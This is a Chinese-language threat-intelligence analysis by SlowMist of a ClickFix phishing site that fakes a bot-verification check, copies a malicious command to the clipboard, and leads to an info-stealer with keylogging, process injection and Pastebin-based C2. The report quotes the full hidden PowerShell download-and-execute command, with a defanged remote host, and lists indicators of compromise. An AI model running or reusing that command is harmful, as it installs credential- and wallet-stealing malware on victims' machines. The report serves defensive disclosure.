值得信赖的区块链资讯!
威胁情报:Clickfix 钓鱼攻击
来源:慢雾科技
作者:Joker&Thinking
编辑:KrsMt.&Liz
背景
近日,MistEye 安全监控系统发现一个钓鱼网站,该网站采用 Clickfix 钓鱼攻击技术。这类钓鱼网站主要通过模仿正规网站常用的机器人校验功能,诱导受害者执行恶意命令,达到下载恶意软件的目的。获取到相关恶意样本信息后,慢雾安全团队立即展开分析。
分析过程
访问该钓鱼网站时,会显示正规网站常用的机器人校验功能。
当受害者点击了 checkbox 开始校验后,该钓鱼网站会将恶意命令自动复制到剪贴板中,并且引导受害者按下特定的按键,实现恶意软件的下载与执行。
在这段前端代码中,程序会监听来自 iframe 或父/子窗口的 postMessage 消息。当接收到“turnstileSuccess”消息时,就会调用 copyTextSilently () 方法。
在 index_1.html 页面的前端代码中,做了 checkbox 监听,当受害者正常触发该 checkbox 后,会向父页面发送“turnstileSuccess”消息。
复制恶意命令到剪贴板
在 copyTextSilently() 方法中,首先会去判断是否满足调用 Clipboard API 条件。
如果条件满足,直接调用 Clipboard#writeText() 方法,写入命令到剪贴板中。
如果条件不满足,则先创建一个 <textarea> 元素,把要复制的命令放到 <textarea> 里,然后隐藏元素并添加到页面后,使用 execCommand() 方法复制命令,最后移除元素。
在前端代码中可以看到,command_win 命令是从全局作用域的 window 对象中获取的。根据注释可以知道,window.command_win 可能是在外部脚本 assets/command.js 中定义的。
查看 command.js 文件可知,该文件中确实定义了全局变量 window.command_win,而该命令的主要功能是从远程服务器下载恶意脚本,并通过 PowerShell 在本地隐藏执行。
powershell -w h -c "$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';$p='$env:USERPROFILE\Music\d.ps1';(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"
从前端代码中可以看到,点击 VERIFY 按钮同样会触发 copyTextSilently () 方法,但受浏览器安全限制,受害者在点击 VERIFY 按钮后,还需再次点击网页页面,才能完成恶意命令的复制操作。
分析恶意脚本
$mmASoSdDL 是一个数组,先通过 join 方法拼接为字符串,再对这段 Base64 编码的字符串进行解码,将得到的字节数组转换为 UTF-8 字符串,最后把该 JSON 字符串转换为 PowerShell 对象。
解码后的部分内容如下:
创建隐藏目录
该恶意脚本会先判断目标目录是否存在,若不存在则创建该目录,并将其属性设置为“Hidden”和“System”。
写入恶意文件
该恶意脚本会遍历 JSON 中的 files 数组,根据此前创建的隐藏目录与数组中的 name 字段拼接出完整文件路径,随后将经过 Base64 编码的 b64 字段解码为原始二进制数据,并写入至该完整路径所指向的文件中。
准备自启动
该恶意脚本会在当前受害者的启动文件夹(Startup) 中创建一个名为 trntl.lnk 的快捷方式。此快捷方式指向恶意文件 trntl.exe,并且会设置系统图标进行伪装。快捷方式创建完成后 trntl.exe 便会在受害者登录或开机时自动执行。
延迟执行
该恶意脚本会生成一个随机名称的临时.cmd 文件,在该文件中设置通过 rundll32 调用 ShellExec_RunDLL 来启动 exe。脚本会等待 60 秒,之后通过 cmd.exe/c 执行这个 .cmd 文件,执行完成后再将该 .cmd 文件删除以清理痕迹。
恶意脚本代码
以下是恶意脚本中的主要代码(原代码为连续文本,为增强可读性,已手动换行处理)。
动态分析
将恶意 exe 文件上传至 VirusTotal 沙箱后,从分析结果可知,该文件已被标记为恶意文件。
(https://www.virustotal.com/gui/file/cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039/detection)
进程注入
从 VirusTotal 沙箱的分析结果来看,恶意程序把代码注入到合法进程(regasm.exe) 的内存空间,然后修改目标进程的执行流,让 regasm.exe 执行恶意代码。
敏感信息收集
从 VirusTotal 沙箱的分析结果来看,该恶意程序展现出典型的信息窃取行为,具体表现为对多个浏览器的敏感数据进行搜索,涉及 Chrome、Chromium、Opera 等。其目的可能是为了窃取浏览器中存储的 cookies、钱包、保存的密码等敏感信息;搜索邮件客户端(如 Thunderbird、Windows Mail)的敏感数据,可能是为了获取邮箱账号和邮件内容等敏感信息;搜索加密货币钱包位置,可能是为了窃取私钥、钱包数据等信息以便盗币;搜索 FTP 工具敏感数据,可能是为了获取 FTP 登录凭据等敏感信息。
键盘记录
从 VirusTotal 沙箱的分析结果来看,该恶意程序具备键盘记录功能,能够实时记录受害者的输入内容,其中可能包括账号、密码等敏感信息。
网络通信
从 VirusTotal 沙箱的分析结果来看,该恶意程序先通过 Pastebin 获得 C2 配置,再和 IP 地址 217[.]12[.]204[.]47[:]9000/443 建立通信,可能会上传窃取的敏感数据或接收恶意指令。
访问 https[:]//pastebin[.]com/raw/rzARed3W 返回恶意 IP 地址信息。
在 VirusTotal 平台中,该 IP 和 URL 都已经被标记为恶意地址,且 IP 地址显示为希腊。
(https://www.virustotal.com/gui/ip-address/217.12.204.47)
(https://www.virustotal.com/gui/url/225eceb2f02ba20308d77ac250e85e43fa927b4d51edb5aa3290679fe17ee72d)
总结
需要注意的是,这类钓鱼网站的攻击往往结合社会工程学手段来实现 —— 通过诱导用户执行某些恶意命令,达成下载恶意软件的目的。用户在毫无防备的情况下执行此类命令,可能导致钱包私钥等敏感信息被盗取。
慢雾安全团队在此建议开发者与用户提高对陌生命令的警惕性,若确实需要进行运行调试,务必在独立且无敏感数据的设备环境中操作。
IoCs
IPs
217[.]12[.]204[.]47
SHA256
-
4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 —— aTu.lim
-
cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 —— trntl.exe
-
60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 —— command.js
Urls
-
https[:]//pastebin[.]com:443/raw/rzARed3W
-
217[.]12[.]204[.]47:443
-
217[.]12[.]204[.]47:9000
-
http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
-
http[:]//electri[.]billregulator[.]com/aTu.lim
比推快讯
更多 >>- 数据:470.85 枚 BTC 从 Bitstamp 转出,价值约 1267 万美元
- 贝森特:美联储距离重返量化宽松还有很长的路要走
- 美元指数上涨 0.52%,收于 99.746
- 摩根大通:自伊朗局势升级以来,避险需求转向,比特币ETF成资金新宠
- CME警告:若美国政府介入石油期货市场将引发史诗级灾难
- 特朗普:鲍威尔应立即降息而非等到下次会议
- 持有 Binance Japan 40%股份的 PayPay IPO 首日大涨 15.6%
- 伊朗称特朗普几条推文结束不了战争
- Backpack 代币上线首日后 FDV 超 3 亿美元概率为 64%
- Santiment:BNB Chain 上 USDT 活跃地址飙升通常伴随比特币反弹
- 美国参议院通过法案条款拟禁止发行 CBDC,禁令或持续至 2030 年
- Backpack 宣布将于 3 月 23 日 TGE
- Claude 上线交互式图表和图形功能,聊天中即可构建
- Ethena 调整 sUSDe 解除质押机制:冷却期改为动态模式,最短缩至 1 天
- 分析:比特币守住 7 万美元,油价飙升与信用风险冲击美国股市
- 国际油价回吐涨幅,此前伊朗副外长称允许了部分船舶通过霍尔木兹海峡
- 数据:今日加密货币市值前 100 代币涨跌
- 某鲸鱼过去 2 小时向 Hyperliquid 存入 560 万枚 USDC 做空石油
- 身份验证基础设施 VeryAI 完成 1000 万美元融资,Polychain Capital 领投
- 伊朗新任最高领袖表态强硬,油价延续涨势、美股三大股指普跌
- 投资者担心中东冲突导致通胀再度抬头,市场不再完全押注美联储今年将降息
- DNA Fund 关联钱包 2 小时前从 Kraken 提取 11,067 枚 ETH
- 油价延续涨势,WTI 原油 4 月期货日内涨超 10%
- BTC OG 内幕巨鲸代理人:油价突破,风险资产或迎剧烈重新定价
- 分析师:Circle 股价强势凸显 USDC 稳定币韧性与基础设施优势
- 交易员调整对 2026 年美联储降息预期
- Lido 整合 Earn 产品并推出首个稳定币金库 EarnUSD
- 美联储理事鲍曼:拟小幅下调大型银行资本要求
- 分析:比特币对黄金走势显现多头背离,机构流入增加暗示“风险中蕴藏机会”
- SEC 主席 Atkins 发表讲话,推动监管瘦身、支持股权代币化创新豁免
- Tether CEO:比特币链上用户 5.71 亿,USDT 约 5.5 亿
- 市场消息:特朗普政府拟暂停《琼斯法案》以平抑油价
- 美 SEC 主席:将考虑创新豁免以促进代币化证券交易
- 美 CFTC 发布预测市场咨询报告
- 美、布两油短线持续上扬,WTI 原油向上触及 96 美元/桶
- “龙虾安装热”带动相关硬件设备市场出现涨价和缺货
- 数据:PIVX 24 小时跌超 10%,CFX 涨超 7%
- 美国商品期货交易委员会发布有关预测市场的指导意见和初步规则
- 最具代表的加密托管赛道公司,Copper、BitGo 等领先
- Vitalik:以太坊本质为全球共享内存,仍需持续改进协议和基础设施
- 某巨鲸从 Binance 提出 348.3 枚 BTC,过去 9 日累计囤积 1,720.2 枚 BTC
- 伊朗伊斯兰革命卫队海军司令:将坚持关闭霍尔木兹海峡的战略
- Ark Invest:约三分之一比特币供应仍面临量子计算潜在威胁
- 伊方声明霍尔木兹海峡将维持关闭,ASTER 最大多头以 500 万规模入场做多原油
- 花旗上调油价预期:布伦特原油短期或上看 80–100 美元
- Vitalik:以太坊核心价值是全球共享“公告板”,智能合约与支付只是附加功能
- 做空 3474 万美元原油巨鲸目前浮亏 184 万美元
- 何一:散布 FUD 很容易,但清除它却总是很难
- 分析师:伊朗新任最高领袖表态强硬,没有任何让步迹象
- 收益型稳定币协议 Unitas 完成 1333 万美元种子轮融资,Amber Group 等参投
比推专栏
更多 >>- 当黄金被「困」在迪拜,是时候旗帜鲜明「唱多」香港了
- 東大、波斯、阿拉伯【第七次/進展/能源變量】|0310東3.5
- 从 HSK 到 USDGO:香港两大持牌机构,开始「脱钩」
- There is no new boss YET
- New situation and new games|0305 Asian
- B52 Were on the way to Iran|0304 Middle East
- 开放独角兽门票:从 Robinhood 到 MSX,一场 Pre-IPO 的链上平权实验
- Big player's 『Trigger moment』|0227Europe
- 简街有没有「操纵」BTC?拆解 AP 制度,读懂 ETF 申赎机制背后的定价权博弈
- Happy new year【Horse success】|0213Asian
观点
比推热门文章
- 美元指数上涨 0.52%,收于 99.746
- 摩根大通:自伊朗局势升级以来,避险需求转向,比特币ETF成资金新宠
- CME警告:若美国政府介入石油期货市场将引发史诗级灾难
- 特朗普:鲍威尔应立即降息而非等到下次会议
- Crypto的陨落,其实和割韭菜没什么关系
- 持有 Binance Japan 40%股份的 PayPay IPO 首日大涨 15.6%
- 伊朗称特朗普几条推文结束不了战争
- Backpack 代币上线首日后 FDV 超 3 亿美元概率为 64%
- Santiment:BNB Chain 上 USDT 活跃地址飙升通常伴随比特币反弹
- 美国参议院通过法案条款拟禁止发行 CBDC,禁令或持续至 2030 年
比推 APP



